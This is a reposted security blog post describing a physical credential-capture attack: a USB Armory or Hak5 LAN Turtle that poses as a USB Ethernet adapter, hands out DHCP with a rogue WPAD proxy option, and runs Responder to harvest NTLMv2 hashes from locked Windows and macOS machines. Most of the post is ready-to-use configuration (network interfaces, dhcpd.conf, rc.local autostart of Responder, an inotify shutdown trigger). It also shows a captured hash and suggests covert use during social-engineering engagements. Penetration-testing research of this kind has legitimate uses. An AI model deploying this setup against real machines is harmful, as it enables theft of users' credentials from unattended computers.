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First off, this is dead simple and shouldn’t work, but it does. Also, there is no possible way that I’m the first one that has identified this, but here it is (trust me, I tested it so many ways to confirm it because I couldn’t believe it was true)

TL;DR USB Ethernet + DHCP + Responder == Creds

Thesis:

If I plug in a device that masquerades as a USB Ethernet adapter and has a computer on the other end, can I capture credentials from a system, even when locked out (yes, logged in, just locked). (..or do even more, but we’ll save that for another time, this post is already too long)

Device Setup

I started off with a USB Armory ($155) but below I’ll show you how to do this with a Hak5 Turtle ($49.99) as well.

I’ll leave the setting up of the base device itself to you, but here are some links that can start you on your way:

USB Armory

Debian/Jessie – https://github.com/inversepath/usbarmory/wiki/Starting#preparing-your-own-microsd-card

Kali on USB Armory – https://docs.kali.org/kali-on-arm/kali-linux-on-usb-armory

Resizing the SD partition – https://base16.io/?p=61

Hak5 Turtle

Turtle video guides and wiki: https://lanturtle.com/wiki/#!videos.md

Basically the capturing is done with Laurent Gaffié’s Responder so you need to find a way to get Responder onto the device. The Hak5 Turtle already has a module for it:

You do have to “Enable” the module for the first time (plugged into Internet access) to get it to actually download all of dependencies and package itself.

Then you also need to do a opkg update and opkg install python-openssl so that Responder will run correctly. This is only a temporary issue as the module is being fixed to include this step.

As for the USB Armory is you can either use SCP, Internet Connection Sharing, the USB host/client adapter:

The default install of Debian/Jessie doesn’t have Python installed so you will have to work through all of the dependencies (on the Kali version this is not needed) and will require Internet access to perform:

apt-get install -y python git python-pip python-dev screen sqlite3 pip install pycrypto git clone https://github.com/spiderlabs/responder

Configuration

Armory

First, setting up the interface isn’t needed but it will help with consistence since each image for the Armory come with different default IP addresses and it’s good to set a solid base.

/etc/network/interfaces

source-directory /etc/network/interfaces.d auto usb0 allow-hotplug usb0 iface usb0 inet static address 192.168 .2 .201 netmask 255.255 .255 .0 gateway 192.168 .2 .1

Next we set up the DHCP server:

/etc/dhcp/dhcpd.conf

ddns-update-style none; option domain-name "domain.local" ; option domain-name-servers 192.168 . 2.201 ; default-lease- time 60 ; max-lease- time 72 ; authoritative; log -facility local7; option local -proxy-config code 252 = text; subnet 192.168 . 2.0 netmask 255.255 . 255.0 { range 192.168 . 2.1 192.168 . 2.2 ; option routers 192.168 . 2.201 ; option local -proxy-config "https://192.168.2.201/wpad.dat" ; }

The only special configuration here is to send the “Proxy Config” option to any DHCP clients. Why this is even a thing I have no idea, but note this line:

“DHCP has a higher priority than DNS: if DHCP provides the WPAD URL, no DNS lookup is performed.”from the Wikipedia article on WPAD

Next we set up things to automatically run. We edit the rc.local file so that it does a few things:

Clears out all DHCP leases and start the DHCP server. There is probably a more elegant way to do this, but because this “computer” is being plugged in and taken out pretty frequently, we could run into a max in leases but most likely the file will get corrupted at some point so we just remove and re-add it. Start Responder in a screen session. This way we can get logging going on the screen session as a sort of backup for the Sqlite3 database and log files that Responder creates.

/etc/rc.local

rm -f / var /lib/dhcp/dhcpd.leases touch / var /lib/dhcp/dhcpd.leases /usr/sbin/dhcpd /usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F' exit 0

To enable logging of the screen sessions (which also gives you insight into if anything went wrong), you add a .screenrc file. There is a lot more that I put in these, mostly for aesthetics but the important pieces are these:

/root/.screenrc

deflog on logfile /root/logs/screenlog _ $USER_.%H.%n.%Y%m%d-%0c:%s.%t. log

That’s it, you should be able to reboot your USB Armory and start picking up creds anywhere you can stick a USB in.

Hak5 Turtle

Everything is pretty much already done for you, the only difference is that opkg is your package manager:

opkg update opkg install python-openssl screen

Remove the symlink to /tmp/ so that the logs will stick around

rm -rf /overlay/etc/turtle/Responder/logs

And the /overlay/etc/rc.local file is slightly different

/overlay/etc/rc.local

/etc/init.d/dnsmasq stop /usr/sbin/screen -dmS responder bash - c 'cd /overlay/etc/turtle/Responder; python Responder.py -I br-lan -f -w -r -d -F'

Why does this work?

Because USB is Plug-and-Play. This means that even if a system is locked out, the device still gets installed. Now, I believe there are restrictions on what types of devices are allowed to install at a locked out state on newer operating systems (Win10/El Capitan), but Ethernet/LAN is definitely on the white list. Computers are constantly creating traffic, even if you don’t have any browsers or applications open, and most computers trust their local network for some reason (I know the technical bits on ‘why’, just complaining…) Network preference when there are more than gateway or network connection is based on “metrics” on Windows and a combination of metrics and “preference” on OSX, but by default “wired” and “newer/faster” always win out.

This means that by plugging in the device it quickly becomes the gateway, DNS server, WPAD server and others thanks to Responder.

The average time for freshly inserted into a locked workstation and by the time I have creds is about 13 seconds, all depends on the system. Some addition setup I used inotify to watch for a file change in the Responder.db database and shutdown the Armory. This helps finalize file writes as well and giving me an indicator via the LED that creds were obtained.

To do that you need to install the inotify-tools package and add the following to the rc.local file:

echo "Staring cred watch" /root/rc.log /usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /root/responder/Responder.db; do shutdown -h now; done'

End Result:

What you see in the video is the Windows 10 lock screen (Full screened fresh install VM). When the LED goes solid white the Armory has fully shutdown because of the watch script, creds achieved!.

Bring it back home and look at the results:

root@wpad :~ 2016 -09- 04 10 : 59 : 43 |HTTP|NTLMv2| 192.168 . 2.1 ||SITTINGDUCK\mubix|| 5 EAEA2859C397D8AE48CA87F: 01010000000001 E9D23F49F7891F38965D80A0010000000000000000000000000000000900260048005400540050002F007800780066006600730062006E007000630000000000000 0 ....

Sweet!! Game over!

Tested on:

Windows 98 SE

Windows 2000 SP4

Windows XP SP3

Windows 7 SP1

Windows 10 (Enterprise and Home)

OSX El Capitan / Mavericks (I was able to get creds on both of these but I’m still testing to see if it was a fluke, or my own configurations)

I still have not tested on Linux, I will make a new post on if that works. Please leave comments below if you see things I can improve upon, or errors.

USB Armory vs Hak5 LAN Turtle

The Armory is more versitile with APT package to do more fun, definitely a great way to dev the attack. More storage (SD based) and slightly faster processor Hak5 LAN Turtle is MUCH easier to pass off when you are trying to plug in a device during an SE attack. It might not have the LED that the Armory does for determining when creds are achieved, but it has the added functionality of a working ethernet port, so you could get creds AND a shell. Definitely worth the extra hassel to get it working right.

Source:https://room362.com

Working as a cyber security solutions architect, Alisa focuses on application and network security. Before joining us she held a cyber security researcher positions within a variety of cyber security start-ups. She also experience in different industry domains like finance, healthcare and consumer products.